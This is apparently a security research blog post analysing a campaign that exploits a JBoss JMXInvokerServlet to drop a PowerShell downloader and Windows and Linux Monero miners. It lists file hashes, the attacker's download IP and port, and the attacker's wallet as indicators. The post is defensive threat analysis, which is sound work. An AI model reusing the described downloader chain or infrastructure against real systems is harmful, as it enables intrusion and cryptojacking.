Nine Booms Monero Miner

On the afternoon of Friday, February 23rd the Emagined Security Research team reviewed an alert passed through our Security Operations team involving a JMXInvokerServlet hit.

Nine Boom 1.png

Based upon traffic patterns and the user agent strings, the team believes the actor is using JexBoss to automate this exploit.

Within the attack code was an obvious PowerShell Downloader pointing to 200[.]7[.]97[.]205, using port 8086. The IP address is reportedly in the Netherlands. 

Nine Boom 2.png

The team immediately captured the text file, which itself was a PowerShell file that downloaded a second stage binary.

Nine Boom 3.png

The files noted, 32Kilences and 64Kilences.exe provide different versions of the executable file, one for 32 bit windows and another for 64 bit.  In Hungarian, Kilences means "Nine."

The team also found that a "lin.txt" is present on the same host, which provides two files, for Linux OS's:

Nine Boom 4.png

BoomBoom is a 64bit statically compiled ELF binary, while BoomBoom2 is the 32bit version.

The team set to decompile the binary; which the attackers made very easy:

32Kilences.exe:             PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive

After decompressing the RAR self-extracting executable we're provided two new files:

MD5 (run.bat) = ac229848385ba895cffd5523602b7162

MD5 (systemgo.exe) = 646cb81ec7e8aaa93a7580491edeb56e

SystemGo.exe is a popular Monero miner, and Run.bat gives us all of the important details:

Nine Boom 5.png

The actors Monero wallet, 45cToD1FzkjAxHRBhYKKLg5utMGENqyamWrY8nLNkVQ4hJgLHex1KNRZcz4finRjMpAYmPxDaXVpN2rV1jMNyXRdMEaH1YA, is clearly visible in the batch file, and is searchable on MineXMR.com:

Nine Boom 6.png

With the actor making somewhere around 11 XMR, the current value of Monero puts that around $3228 USD.

Nine Boom 7.png

Evidence that even unskilled attackers can use open source technology to make a few dollars.

This campaign has been logged with Alienvault's OTX,

The original win.txt and lin.txt are available here.


Observables:

MD5 (32Kilences.exe) = 5f980357049bec59acf4fa3f64ad076f

MD5 (64Kilences.exe) = 41f120f918d226275471e00f1fd7bd2f

MD5 (win.txt) = e7f9375443cd29f771875c185062c6ba

MD5 (BoomBoom) = f75a3ee5fba082e6ccc38373cff39176

MD5 (BoomBoom2) = 2e49d437c95119becb881a3a269832d6

MD5 (lin.txt) = 0d3784ddb430cdeb2f0641a68b7715e4

SHA1 (32Kilences.exe) = 33a714dd10caf6f7e1ecfd7290de02ac0ef565ac

SHA1 (64Kilences.exe) = 4d17be57e35eecf5a7ba6fa54084179527594635

SHA1 (win.txt) = 7966aba65e7f64a746ecb34eac14f515156a8145

SHA1 (lin.txt) = bf095c444bcae7aae21a4a823e7f83b42a626547

SHA1 (BoomBoom) = 2652eea0140a0b0de3a642b9a0263a7f67ce83ac

SHA1 (BoomBoom2) = 957109bd145306ff38f703d8cd0955f1114c3a85

IP = 200.7.97.205 PORT: 8086

 

Social Media OSINT for Security Teams

The Evolution of Malware and other key findings in the 2018 CISCO Cybersecurity Report

0